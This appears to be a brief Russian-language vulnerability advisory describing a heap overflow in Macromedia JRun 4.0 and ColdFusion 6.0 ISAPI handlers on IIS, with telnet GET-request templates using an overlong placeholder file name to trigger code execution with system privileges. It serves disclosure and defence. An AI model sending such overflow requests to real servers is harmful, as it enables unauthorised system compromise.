ISAPI обработчики Macromedia JRun и ColdFusion в IIS
подвержены переполнению динамической памяти при обработке длинных имен файлов.
При передаче имени файла размером более 4096, часть динамической памяти может быть перезаписана. Любой код, снабженный атакующим, будет выполнен с системными привилегиями. Пример: 

Для JRun 

telnet example.com 80 
GET /[+4096 byte buffer].jsp HTTP/1.0 
[enter] 
[enter] 

Для ColdFusion 

telnet example.com 80 
GET /[+4096 byte buffer].cfm HTTP/1.0 
[enter] 
[enter] 

Уязвимость обнаружена в Macromedia Coldfusion 6.0 и
более ранних версихя (IIS ISAPI), Macromedia JRun 4.0 и
более ранних версиях (IIS ISAPI).



Оставить мнение